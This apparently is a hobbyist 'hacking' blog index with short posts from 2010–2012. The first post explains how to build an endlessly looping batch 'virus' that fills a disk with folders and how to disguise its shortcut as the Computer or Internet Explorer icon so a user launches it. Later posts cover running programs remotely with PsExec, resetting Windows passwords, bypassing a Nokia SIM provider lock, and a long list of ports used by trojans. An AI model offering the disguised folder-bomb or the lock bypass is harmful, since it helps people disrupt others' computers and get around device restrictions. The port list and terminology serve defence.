Posts which you will also like.

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Tuesday, October 2, 2012

How to create random folder creating virus?



In this blog post I will teach you how to create more than 5000 random folders in a minute but before this I want to warn you that I do not take any responsibility for causing harm to your or any other computer.This tutorial is just for informative purpose only Smile.


Techyrajeev.blogspot.com


For this we will use the help of bat files and simple dos commands.So follow the step by step procedure for creating random folder creating virus if you want to create one.

Step 1: Open the notepad or any other text editor

Step 2: Type the following things

@ECHO OFF
:LABEL
md %RANDOM%
GOTO LABEL

 
Explanation: This is very simple bat file which runs infinitely with the help of recursive(self) calling(GOTO LABEL) and between these calls we are creating empty directory using md(You can write any other command instead of md).


Step 3: Now save it with Computer.bat in your hard disk.


Step 4: Now send it’s shortcut to desktop and change it’s default icon to icon of the computer or anything you like e.g Internet Explorer but do not forget to change the name accordingly.
ComputerBat
Step 5: Now delete or hide the original one from desktop so that user of the system will click on the fake one.Njoy the magic of bat files Thumbs up.AfterComputer
Read More ->>

Saturday, September 29, 2012

BackTrack 5 R3 Unleashed



Great news for our hacker friends a new version of popular penetration testing tool BackTrack 5 R3 is released.
BackTrack 5 R3 will provide latest hacking tools and more stable penetration testing environment than its predecessor.BackTrack 5 R3 is built upon linux kernal 3.2.6 which has updated version of hacking tools and latest securities patches.

bt5-6

BackTrack main website has a nice tutorial on how to upgrade from BackTrack 5 R1 to BackTrack 5 R3.If you want to upgrade your BackTrack to latest one the you can do it from this link.
If you are new to BackTrack then you can download the latest BackTrack from here.
Read More ->>

Saturday, July 28, 2012

BackTrack 5 KDE startx problem fixed


While installing the BackTrack 5 KDE(64 bit) OS when you try to enter into GUI mode via typing startx you get a strange error message like this:

BackTrack
This is well known bug in BackTrack 5 KDE (64 bit version) and many user asked me about the solution of this bug.
This problem can be fixed by deleting the kcache files from the following directories:
  • /root/.kde/cache-bt
  • /root/.kde/cache-root
Since GUI is not available without the startx so you will have to use the commands to delete all kcache files in the above directories.So Type the following commands
# cd /root/.kde/
# find . -type f -iname "*.kcache" -delete
or
rm /root/.kde/cache-root/icon-cache.kcache
rm /root/.kde/cache-root/plasma_theme_Volatile.kcacherm /root/.kde/cache-bt/icon-cache.kcache
rm /root/.kde/cache-bt/plasma_theme_Volatile.kcache

As usual now type startx command.

Some people also found some alternatives to fix this problem you can also try these

  • Boot from live cd or use vmware to boot the backtrack
  • Wait till the screen to decide which mode to boot.
  • Press the TAB key. (This opens the grub options for the live boot)
  • Change the section with "text splash vga=791" to "text splash vga=791 i915.modeset=1".
  • Press the ENTER key.
  • Type startx and Wait for Gui to appear
bt5-6
More on this at techcresendo.com
Read More ->>

Wednesday, April 4, 2012

BackTrack 5 R2 Unleashed !



Great news for our hacker friends a new version of popular penetration testing tool BackTrack 5 R2 is released.
BackTrack 5 R2 will provide latest hacking tools and more stable penetration testing environment than its predecessor.BackTrack 5 R2 is built upon linux kernal 3.2.6 which has updated version of hacking tools and latest securities patches.

bt5-6

BackTrack main website has a nice tutorial on how to upgrade from BackTrack 5 R1 to BackTrack 5 R2.If you want to upgrade your BackTrack to latest one the you can do it from this link.
If you are new to BackTrack then you can download the latest BackTrack from here.

More on this at techcresendo.com
Read More ->>

Friday, December 30, 2011

Running executable files on a remote computer



To run executable files on a remote computer first of all you have to download the Pstools suite.
You can download Pstools from here: http://technet.microsoft.com/en-us/sysinternals/bb896649.aspx

About Pstools suite:Light bulb
Pstools is a command line tool package, that has some tools like the; psexec, pslist, psservice, psloggedon and some more tools.
PsTools let you manage local AND remote systems, that's nice because we want to do some remote stuff.
One of the relevant tool for this post is Psexec which lets us to run a program on the remote system/host.

Sysntax for Psexec: Light bulb
Psexec -i \\HOST P:\a\t\h\program
The -i option let you run it interactively.
Where the \\HOST is is the host computer name or IP address.
Then you give the path of the program and the program name to be run.

Example: 
Psexec -i \\Rajeev-PC C:\WINDOWS\System32\mspaint.exe
Psexec -i \\Rajeev-PC "C:\Program Files\Internet Explorer\iexplore.exe" “www.techyrajeev.blogspot.com


Read More ->>

Monday, November 7, 2011

BackTrack 5 Released !

Most favorite OS for System penetration testing and Ethical Hacking BackTrack 5 in released recently.This version has several improvement over the previous one.
This BackTrack version is based on Ubuntu Lucid LTS. Kernel 2.6.38.


As with its predecessor this BackTrack version is also freely available to download.So What are you thinking now ! ! !
Download it and start the hacking(Ethical) :)

Download the BackTrack 5 from here: BackTrack 5

Read More ->>

Sunday, March 27, 2011

Playing with Google:I am feeling lucky

Here are some tweaks you can play with google I am feeling lucky option.
1.google holiday:shows the holiday logo and events in style of google
2.google bsd:show the linux version of google
3.google linux:show the linux version of google
4.google easter egg:lets you to play the easter egg game
5.google scholar:Useful for scholars
6.google suggest:this will give you suggestions in your search
7.early google:shows the earliest version of google when it was not too popular as today
8.elgoog:reverses the name of google
9.google blog search:lets your search to be blog specific
10.google heart page:shows the bouncing heart following your mouse at the screen
11.google zeitgeist:lets you to search patterns,trends,and surprises (provides very accurate search)
12.gogole moms:A page of google for mother's day
13.xx-hacker:Shows the search page suitable for hackers!
14.google mentalplex:Search smarter and faster with Google's MentalPlex
press I am feeling lucky after typing these keywords and see the result(do not type ':' with keywords).
Read More ->>

Monday, November 29, 2010

A tutorial about proxies

Proxy:

Proxies are caches that relay data. When you configure your web browser to use a proxy, it never connects to the URL. Instead it always connects to the proxy server, and asks it to get the URL for you. It works similarly with other type of services such as IRC, ICQ etc. There'll won't be direct connection between you and the server, so your real IP address won't be revealed to the server. When you view a website on the server, the server won't see your IP. Some of web proxies do not support forwarding of the cookies whose support is required by some of the websites (for ex. Hotmail).
Here are some anonymous proxies that you can use to surf anonymously (notice that some of these may be a payed service):
Aixs - http://aixs.net/
Rewebber - http://www.anon.de/
Anonymizer - http://www.anonymizer.com/
The Cloak - http://www.the-cloak.com/
Clearly Drunk-http://clearly-drunk.com/
You'll highly probably find many websites that provide the lists of unauthorized proxies and re mailers . Such lists are being compiled usually with the help of port scanners or exploit scanners, scanning for computers with win gate or other proxies' backdoors. Using these proxies is illegal, and is being considered as unauthorized access of computer. If you get such list to your hands, check if the info is legal or compiled by script kiddie, and act accordingly.
If you anyhow decide not to use proxy, at least do not forget to remove your personal information from your browser. After you remove details like your name and e-mail address from your browser, the only info a Web site can sniff out is your ISP's address and geographical location. Also Java and JavaScript applets can take control of your browser unexpectedly, and if you are surfing to unknown and potentially dangerous places you should be aware of that. There are exploitable browser bugs (mainly Internet explorer ones) reported ever week.

Read More ->>

How to know the IP address of others using coding.

To Get And Show The IP address:

To show the ip via JavaScript
Code:

var ip= '''''';
document.write("Your IP Address is :"+ip+" ");
*Remove double quotes in first line
________________________________________________________________________________
To show IP via ASP
code:
request.ServerVariables("REMOTE_ADDR")
________________________________________________________________________________
TO SHOW IP VIA PHP
Code:
$remote_address = getenv("REMOTE_ADDR");
echo "Your IP address is $remote_address.";
$browser_type = getenv("HTTP_USER_AGENT");
echo "You are using $browser_type.";
?>

Read More ->>

Commonly used ports by Trojans

Be careful when any suspicious activity happens on these ports.

 TCP 1 Breach.2001, SocketsDeTroie.230, SocketsDeTroie.250
TCP 28 Amanda.200
TCP 31 MastersParadise.920
TCP 68 Subseven.100
TCP 142 NetTaxi.180
TCP 146 Infector.141, Intruder.100, Intruder.100
TCP 171 ATrojan.200
TCP 285 WCTrojan.100
TCP 286 WCTrojan.100
TCP 334 Backage.310
TCP 370 NeuroticKat.120, NeuroticKat.130
TCP 413 Coma.109
TCP 420 Breach.450
TCP 555 Id2001.100, PhaseZero.100, StealthSpy.100
TCP 623 Rtb666.160
TCP 660 Zaratustra.100
TCP 661 Noknok.800, Noknok.820
TCP 666 BackConstruction.210, BackConstruction.250, Bla.100, Bla.200, Bla.400, Bla.503, Cain.150, Dimbus.100, Noknok.820, Ripper.100, SatansBackdoor.100, SatansBackdoor.101, SatansBackdoor.102, Unicorn.100, Unicorn.101, Unicorn.110
TCP 667 SniperNet.210, Snipernet.220
TCP 668 Unicorn.101, Unicorn.110
TCP 680 Rtb666.160
TCP 777 Tiny.100, Undetected.230, Undetected.300, Undetected.310, Undetected.320, Undetected.330, Undetected.331, Undetected.332
TCP 785 NetworkTerrorist.100
TCP 800 NeuroticKitten.010
TCP 831 NeuroticKat.100, NeuroticKat.120, NeuroticKat.130
TCP 901 NetDevil.130, NetDevil.140
TCP 1000 DerSpaeher.200
TCP 1001 Silencer.100
TCP 1008 AutoSpy.100
TCP 1010 DerSpaeher.200
TCP 1015 Doly.150
TCP 1111 TPort.100
TCP 1130 Noknok.800, Noknok.820
TCP 1207 SoftWAR.100
TCP 1243 Subseven.100, SubSeven.110, SubSeven.180, SubSeven.190, Subseven.200
TCP 1245 VoodooDoll.006
TCP 1269 Matrix.130
TCP 1480 RemoteHack.130
TCP 1568 RemoteHack.100, RemoteHack.110
TCP 1600 DirectConnection.100
TCP 1601 DirectConnection.100
TCP 1602 DirectConnection.100
TCP 1634 NetCrack.100
TCP 1784 Snid.120, Snid.212
TCP 1999 TransmissionScout.100, TransmissionScout.110
TCP 2000 ATrojan.200, InsaneNetwork.400
TCP 2001 DIRT.220, TrojanCow.100
TCP 2003 TransmissionScout.100, TransmissionScout.110
TCP 2023 RipperPro.100
TCP 2040 InfernoUploader.100
TCP 2115 Bugs.100
TCP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
TCP 2332 SilentSpy.202
TCP 2589 Dagger.140
TCP 2600 DigitalRootbeer.100
TCP 2989 Rat.200
TCP 3128 MastersParadise.970
TCP 3129 MastersParadise.920, MastersParadise.970
TCP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
TCP 3215 BlackStar.100, Ghost.230
TCP 3333 Daodan.123
TCP 3410 OptixPro.100, OptixPro.110
TCP 3456 Force.155, TerrorTrojan.100
TCP 3505 AutoSpy.130, AutoSpy.140
TCP 3586 Snid.120, Snid.212
TCP 3700 PortalOfDoom.100
TCP 3723 Mantis.100
TCP 3800 Eclypse.100
TCP 3996 RemoteAnything.364
TCP 4000 SkyDance.220, SkyDance.229
TCP 4201 Wartrojan.160, Wartrojan.200
TCP 4225 SilentSpy.202
TCP 4321 Bobo.100
TCP 4444 AlexTrojan.200, Crackdown.100
TCP 4488 EventHorizon.100
TCP 4523 Celine.100
TCP 4545 InternalRevise.100, RemoteRevise.150
TCP 4567 FileNail.100
TCP 4666 Mneah.100
TCP 4950 ICQTrojan.100
TCP 5005 Aladino.060
TCP 5025 Keylogger.WMRemote.100
TCP 5031 NetMetro.104
TCP 5032 NetMetro.104
TCP 5033 NetMetro.104
TCP 5050 RoxRat.100
TCP 5151 OptixLite.020, OptixLite.030, OptixLite.040
TCP 5190 MBomber.100
TCP 5277 WinShell.400
TCP 5343 WCRat.100
TCP 5400 BackConstruction.120, BackConstruction.150, BladeRunner.080, DeepThroat.300
TCP 5401 BackConstruction.120, BackConstruction.150, BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5402 BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
TCP 5534 TheFlu.100
TCP 5550 XTCP.200, XTCP.201
TCP 5555 Noxcape.100, Noxcape.200
TCP 5695 Assassin.100
TCP 5714 WinCrash.100
TCP 5741 WinCrash.100
TCP 5742 WinCrash.103
TCP 5802 Y3KRat.160
TCP 5810 Y3KRat.160
TCP 5838 Y3KRat.170
TCP 5858 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5880 Y3KRat.140
TCP 5881 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5883 Y3KRat.110, Y3KRat.140
TCP 5884 Y3KRat.140, Y3KRat.150
TCP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5886 Y3KRat.120, Y3KRat.140
TCP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
TCP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5889 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
TCP 5890 Y3KRat.140
TCP 6400 Thething.100, Thething.150
TCP 6556 AutoSpy.120, AutoSpy.122
TCP 6655 Aqua.020
TCP 6660 LameSpy.095
TCP 6666 LameRemote.100, ProjectMayhem.100
TCP 6669 Vampire.100
TCP 6670 DeepThroat.200, DeepThroat.210
TCP 6671 DeepThroat.310
TCP 6699 HostControl.101
TCP 6711 DeepThroat.300, Noknok.820, SubSeven.180, SubSeven.190
TCP 6712 Subseven.100
TCP 6713 Subseven.100
TCP 6767 NTRC.120
TCP 6776 SubSeven.180, SubSeven.190, Subseven.200
TCP 6789 Doly.200
TCP 6796 SubSeven.214
TCP 6912 ShitHeep.100
TCP 6939 Indoctrination.100
TCP 6953 Lithium.100
TCP 6969 2000Cracks.100, Bigorna.100, Danton.110, Danton.210, Danton.220, Danton.310, Danton.320, Danton.330, GateCrasher.110, NetController.108, Sparta.110, VagrNocker.120
TCP 6970 Danton.330
TCP 7001 Freak88.100
TCP 7119 Massaker.100
TCP 7200 Massaker.110
TCP 7300 Coced.221
TCP 7301 Coced.221
TCP 7306 NetSpy.200, NetSpy.200
TCP 7410 Phoenix.190, Phoenix.200
TCP 7511 Genue.100
TCP 7609 Snid.120, Snid.212
TCP 7614 Wollf.130
TCP 7648 BlackStar.100, Ghost.230
TCP 7788 Last.2000, Matrix.200
TCP 7826 MiniOblivion.010, Oblivion.010
TCP 7887 SmallFun.110
TCP 7891 Revenger.100
TCP 7979 VagrNocker.200
TCP 7997 VagrNocker.200
TCP 8000 XConsole.100
TCP 8011 Way.240
TCP 8012 Ptakks.215, Ptakks.217
TCP 8110 LoseLove.100
TCP 8111 LoseLove.100
TCP 8301 LoseLove.100
TCP 8302 LoseLove.100
TCP 8372 NetBoy.100
TCP 8720 Connection.130
TCP 8734 AutoSpy.110
TCP 8811 Force.155
TCP 8899 Last.2000
TCP 9000 Aristotles.100
TCP 9301 LoseLove.100
TCP 9400 InCommand.100, InCommand.110, InCommand.120, InCommand.130, InCommand.140, InCommand.150, InCommand.153, InCommand.160, InCommand.167, InCommand.170
TCP 9401 InCommand.100, InCommand.110, InCommand.170
TCP 9402 InCommand.100, InCommand.110
TCP 9561 CRatPro.110
TCP 9563 CRatPro.110
TCP 9580 TheefLE.100
TCP 9696 Danton.210, Ghost.230
TCP 9697 Danton.320, Danton.330, Ghost.230
TCP 9870 R3C.100
TCP 9872 PortalOfDoom.100
TCP 9873 PortalOfDoom.100
TCP 9874 PortalOfDoom.100
TCP 9875 PortalOfDoom.100
TCP 9876 Rux.100, SheepGoat.100
TCP 9877 SmallBigBrother.020
TCP 9878 SmallBigBrother.020, TransmissionScout.100, TransmissionScout.110, TransmissionScout.120
TCP 9879 SmallBigBrother.020
TCP 9999 ForcedEntry.100, Infra.100, Prayer.120, Prayer.130, TakeOver.200, TakeOver.300
TCP 10001 DTr.130, DTr.140
TCP 10013 Amanda.200
TCP 10067 PortalOfDoom.100
TCP 10100 Gift.240
TCP 10101 NewSilencer.100
TCP 10167 PortalOfDoom.100
TCP 10528 HostControl.100, HostControl.260
TCP 10607 Coma.109
TCP 10666 Ambush.100
TCP 11011 Amanda.200
TCP 11050 HostControl.101
TCP 11051 HostControl.100, HostControl.260
TCP 11223 AntiNuke.100, Progenic.100, Progenic.110
TCP 11225 Cyn.100, Cyn.103, Cyn.120
TCP 11306 Noknok.800, Noknok.820
TCP 11831 Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 11991 PitfallSurprise.100
TCP 12043 Frenzy.2000
TCP 12345 Fade.100, Netbus.160, Netbus.170, VagrNocker.400
TCP 12346 Netbus.160, Netbus.170
TCP 12348 Bionet.210, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.316, Bionet.317
TCP 12349 Bionet.084, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.314, Bionet.316, Bionet.317, Bionet.401, Bionet.402
TCP 12389 KheSanh.210
TCP 12478 Bionet.210
TCP 12623 Buttman.090, Buttman.100
TCP 12624 Buttman.090, Buttman.100
TCP 12625 Buttman.100
TCP 12904 Akropolis.100, Rocks.100
TCP 13473 Chupacabra.100
TCP 13753 AFTP.010
TCP 14100 Eurosol.100
TCP 14194 CyberSpy.840
TCP 14286 HellDriver.100
TCP 14500 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14501 PCInvader.060, PCInvader.070
TCP 14502 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14503 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14504 PCInvader.050, PCInvader.060
TCP 15092 HostControl.100, HostControl.260
TCP 15382 SubZero.100
TCP 15432 Cyn.210
TCP 15555 ICMIBC.100
TCP 16322 LastDoor.100
TCP 16484 MoSucker.110
TCP 16661 Dfch.010
TCP 16969 Progenic.100
TCP 16982 AcidShiver.100
TCP 17300 Kuang.200
TCP 17499 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17500 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17569 Infector.141, Infector.160, Infector.170, Infector.180, Infector.190, Infector.200, Intruder.100, Intruder.100
TCP 17593 AudioDoor.120
TCP 19191 BlueFire.035, BlueFire.041
TCP 19604 Metal.270
TCP 19605 Metal.270
TCP 19991 Dfch.010
TCP 20000 Millenium.100
TCP 20001 Millenium.100, PshychoFiles.180
TCP 20002 AcidKor.100, PshychoFiles.180
TCP 20005 MoSucker.200, MoSucker.210, MoSucker.220
TCP 21212 Schwindler.182
TCP 21554 Exploiter.100, Exploiter.110, Girlfriend.130, GirlFriend.135
TCP 21579 Breach.2001
TCP 21584 Breach.2001
TCP 21684 Intruse.134
TCP 22068 AcidShiver.110
TCP 22115 Cyn.120
TCP 22222 Prosiak.047, Ruler.141, Rux.300, Rux.400, Rux.500, Rux.600
TCP 22223 Rux.400, Rux.500, Rux.600
TCP 22456 Bla.200, Bla.503
TCP 22457 AcidShiver.120, Bla.200, Bla.503
TCP 22784 Intruzzo.110
TCP 22845 Breach.450
TCP 22847 Breach.450
TCP 23005 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23006 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23032 Amanda.200
TCP 23432 Asylum.010, Asylum.012, Asylum.013, Asylum.014, MiniAsylum.110
TCP 23456 EvilFTP.100, VagrNocker.400
TCP 23476 DonaldDick.153, DonaldDick.154, DonaldDick.155
TCP 23477 DonaldDick.153
TCP 24000 Infector.170
TCP 24307 Wildek.020
TCP 25386 MoonPie.220
TCP 25486 MoonPie.220
TCP 25555 FreddyK.100, FreddyK.200
TCP 25556 FreddyK.100
TCP 25685 MoonPie.010, MoonPie.012, MoonPie.130, MoonPie.220, MoonPie.240, MoonPie.400
TCP 25686 MoonPie.135, MoonPie.200, MoonPie.400
TCP 25982 MoonPie.135, MoonPie.200
TCP 26274 Delta.050
TCP 27160 MoonPie.135, MoonPie.200
TCP 27184 Alvgus.100, Alvgus.800
TCP 27374 Muerte.110, Subseven.210, SubSeven.213
TCP 28429 Hack'a'Tack.2000
TCP 28430 Hack'a'Tack.2000
TCP 28431 Hack'a'Tack.2000
TCP 28432 Hack'a'Tack.2000
TCP 28433 Hack'a'Tack.2000
TCP 28434 Hack'a'Tack.2000
TCP 28435 Hack'a'Tack.2000
TCP 28436 Hack'a'Tack.2000
TCP 29559 DuckToy.100, DuckToy.101, Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 29891 Unexplained.100
TCP 30000 Infector.170
TCP 30001 Error32.100
TCP 30003 LamersDeath.100
TCP 30029 AOLTrojan.110
TCP 30100 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30101 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30102 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30103 NetSphere.131
TCP 30947 Intruse.134
TCP 31320 LittleWitch.400, LittleWitch.420
TCP 31337 BackOrifice.120, Khaled.100, OPC.200
TCP 31415 Lithium.101
TCP 31416 Lithium.100, Lithium.101
TCP 31557 Xanadu.110
TCP 31631 CleptoManicos.100
TCP 31745 Buschtrommel.100, Buschtrommel.122
TCP 31785 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31787 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31789 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31791 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31887 BDDT.100
TCP 31889 BDDT.100
TCP 32100 ProjectNext.053
TCP 32418 AcidBattery.100
TCP 32791 Akropolis.100, Rocks.100
TCP 33291 RemoteHak.001
TCP 33333 Blackharaz.100, Prosiak.047, SubSeven.214
TCP 33577 SonOfPsychward.020
TCP 34324 TelnetServer.100
TCP 34763 Infector.180, Infector.190, Infector.200
TCP 35000 Infector.190, Infector.200
TCP 35600 Subsari.140
TCP 36794 BugBear.100
TCP 37237 Mantis.020
TCP 37651 YAT.210
TCP 37653 YAT.310
TCP 40308 Subsari.140
TCP 40412 TheSpy.100
TCP 40421 MastersParadise.970
TCP 40422 MastersParadise.970
TCP 40999 DiemsMutter.110, DiemsMutter.140
TCP 41626 Shah.100
TCP 44444 Prosiak.070
TCP 45673 Akropolis.100, Rocks.100
TCP 47262 Delta.050
TCP 48006 Fragglerock.200
TCP 49683 HolzPferd.210
TCP 50000 Infector.180
TCP 50130 Enterprise.100
TCP 50766 Fore.100
TCP 51234 Cyn.210
TCP 51966 Cafeini.080, Cafeini.110
TCP 54321 PCInvader.010
TCP 57341 NetRaider.100
TCP 57922 Bionet.084
TCP 58008 Tron.100
TCP 58009 Tron.100
TCP 59090 AcidReign.200
TCP 59211 DuckToy.100, DuckToy.101
TCP 59345 NewFuture.100
TCP 60000 DeepThroat.300, MiniBacklash.100, MiniBacklash.101, MiniBacklash.101
TCP 60411 Connection.100, Connection.130
TCP 60412 Connection.130
TCP 60552 RoxRat.100
TCP 63536 InsaneNetwork.500
TCP 63878 AphexFTP.100
TCP 63879 AphexFTP.100
TCP 64969 Lithium.100
TCP 65000 Socket.100
UDP 1 SocketsDeTroie.250
UDP 666 Bla.200, Bla.400, Bla.503, Noknok.820
UDP 1130 Noknok.800, Noknok.820
UDP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
UDP 2989 Rat.200
UDP 3128 MastersParadise.970
UDP 3129 MastersParadise.920, MastersParadise.970
UDP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
UDP 3333 Daodan.123
UDP 3800 Eclypse.100
UDP 3996 RemoteAnything.364
UDP 4000 RemoteAnything.364
UDP 5555 Daodan.123
UDP 5881 Y3KRat.110, Y3KRat.140
UDP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
UDP 5883 Y3KRat.110, Y3KRat.140
UDP 5884 Y3KRat.140, Y3KRat.150
UDP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5886 Y3KRat.120, Y3KRat.140
UDP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.150
UDP 6953 Lithium.100
UDP 8012 Ptakks.217
UDP 10067 PortalOfDoom.100
UDP 10167 PortalOfDoom.100
UDP 10666 Ambush.100
UDP 11225 Cyn.100, Cyn.103, Cyn.120
UDP 11306 Noknok.800, Noknok.820
UDP 12389 KheSanh.210
UDP 12623 Buttman.090, Buttman.100
UDP 12625 Buttman.100
UDP 14100 Eurosol.100
UDP 23476 DonaldDick.155
UDP 26274 Delta.050
UDP 27184 Alvgus.100
UDP 28431 Hack'a'Tack.2000
UDP 28432 Hack'a'Tack.2000
UDP 28433 Hack'a'Tack.2000
UDP 28434 Hack'a'Tack.2000
UDP 28435 Hack'a'Tack.2000
UDP 28436 Hack'a'Tack.2000
UDP 29891 Unexplained.100
UDP 30103 NetSphere.131
UDP 31320 LittleWitch.400, LittleWitch.420
UDP 31337 BackOrifice.120, OPC.200
UDP 31416 Lithium.100, Lithium.101
UDP 31789 Hack'a'Tack.100, Hack'a'Tack.112
UDP 31791 Hack'a'Tack.100, Hack'a'Tack.112
UDP 33333 Blackharaz.100
UDP 47262 Delta.050
UDP 49683 HolzPferd.210
UDP 60000 MiniBacklash.100


Read More ->>

Make Firefox to run very much faster

In the URL bar, type “about:config” and press enter. This will bring up the configuration “menu” where you can change the parameters of Firefox.
These settings are effective for bradband connection.
Double Click on the following settins and put in the numbers below - for the true / false booleans - they’ll change when you double click.

Code:
browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 48
network.http.max-connections-per-server – 16
network.http.max-persistent-connections-per-proxy – 8
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300
One more thing… Right-click somewhere on that screen and add a NEW -> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0”. This value is the amount of time the browser waits before it acts on information it receives. Since you’re broadband - it shouldn’t have to wait.
Last but important advice try to use only useful addons for Firefox.
Njoy.

Read More ->>

Tuesday, November 23, 2010

Nokia All Secret Codes

 WARNING: Using secret codes may be harmful to your phone and result in disabling or worse. Use these codes at your own risk!!!
  • IMEI Number :
    *#06# Cells Identity Code (IMEI = International Mobile Equipment Identity)
  • Software Version
    *#0000# shows the software version
  • Signal Processing
    *3370# - Enchanced full Rate Codec (EFR) activation. It will automatically restart.  
    #3370# - Enchanced full Rate Codec (EFR) deactivation
    *4720# - Half Rate Codec activation. It will automatically restart.  
    #4720# - Half Rate Codec deactivation 
    Sim Clock Stopping
  • *#746025625#
    [*#sim0clock#]
    Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by
    mode which will save battery time. This code doesn't work with software
    version 4.59.
    It will tell you if it can be stopped or not.
  • Warrenty Menu
    *#92702689# takes you to a secret menu with 6 choices:
    [*#war0anty#]
    1. Displays Serial Number.
    2. Displays the Month and Year of Manufacture (0997).
    3. Displays (if there) the date where the phone was purchased (MMYY).
    4. Displays the date of the last repairment - if found (0000).
    5. Makes you capable of transferring user data if you have the gear for it.
    6. Shows how long the phone has been used to talk. This counter is not
    reset by when you "clear timers" like the counters in the call register.  
  • Bypass the SP lock With a Nokia 16xx/21xx/31xx/51xx/81xx
    1. Insert SIM card of different provider.
    2. Turn on the phone and press the UP VOLUME key for 3 sec.
    Then release it and the phone says PIN CODE?
    3. Press the "C" key.
    4. Then Press * and wait until it disappears and appears again, then press
    * one more time and 04*PIN*PIN*PIN# 
NJoy:
Read More ->>

Saturday, October 23, 2010

How to Know Which sites are safe for browsing????

While on the Internet some times we generally submit our sensitive data to some sites we even don't know.
These sites may breach your browser security and may spread viruses in your computer and can use your sensitive data to swindle you.How to get rid off these sites???

 There is a simple and free solution to this problem !!!

McAfee SiteAdvisor

This is a free browser plugin that gives safety advice about websites on the search results page before you actually click on the links. After you install the SiteAdvisor plugin, you will see a small rating icon next to each search result which will alert you about suspecious/risky websites and help you find safer alternatives. These ratings are derived based on various tests conducted by McAfee.
Based on the quality of links, SiteAdvisor may display Green, Yellow, Red or Grey icon next to the search results. Green means that the link is completely safe, Yellow means that there is a minor risk, Red means a mojor risk and Grey means that the site is not yet rated. These results will guide you to Web safety.
SiteAdvisor works on both Internet Explorer and Firefox which you can download from the following link: http://www.siteadvisor.com/download/windows.html

Read More ->>

Tuesday, October 5, 2010

Reset non-administrator account passwords

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.
1. Open the command prompt (Start->Run->type cmd->Enter)
2. Now type net user and hit Enter
3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name Joker, then do as follows
4. Type net user Joker * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason.
There are also some other tools such as PClogin now,Ophcrack ,Backtrack, Offline NT Password & Reg Editor .
They are used when even administrator does not remember his/her password.
Some of these tools are available at free of cost and user need to burn them on cd before he/she can use it.
These are Live Os with Linux based kernal.
After burning simply boot with the cd  and follow the instruction and you are done................................
Read More ->>

Hacker Jargon

Here are some terms which a computer user must know:
Malware  –  The generic term used  for all forms of software
designed with malicious intent. Viruses, worms, spyware etc.
are all forms of malware. The term  virus  is often used when
malware should really be used as it describes all forms of
malicious software.
Virus  – A computer virus acts  very much like a human virus.
Human viruses are spread, via thumb drives, floppy discs,
network connections etc., to  other PCs.  Viruses need a host
(like a free screensaver program) to spread. By pure definition:
a virus has the ability to spread itself,  via a host, to other
computers.
Worm  –  A worm is much like a virus. The key difference is
worms can spread between PCs without a host (free
screensaver program, downloaded game etc.) These programs rely on computer networks and usually damage files and slow
down networks in their path.
Trojan(horse)  -  A Trojan horse is a seemingly
harmless program that looks to provide value. However, just as
in Greek mythology, a Trojan horse has a secret agenda and
acts as a backdoor to your computer. This backdoor can be
accessed by a hacker to compromise your PC. Trojan horses are
not self-replicating and spread due to users installing them
manually on their PC.
Spyware  –  Spyware tracks a user’s activity by monitoring
browsing habits and keyboard activity and can even take
screenshots while you use your PC. This information is sent
back to the creator  or beneficiary of the spyware. Signs of
spyware include: modified browser homepages, slow internet,
and suspicious looking sites in place of legitimate sites.
Adware  –  Like spyware, adware is software that  may track
visited websites and act as a key logger. Adware tracks this
information to  automatically display  downloaded or installed
adverts to a user. You may wonder why you are being offered
“PC Super Anti Spyware 2011” when using your PC; this is
adware at work. AIM, FlashGet, Deamon Tools, and RealPlayer
are all examples of adware. 
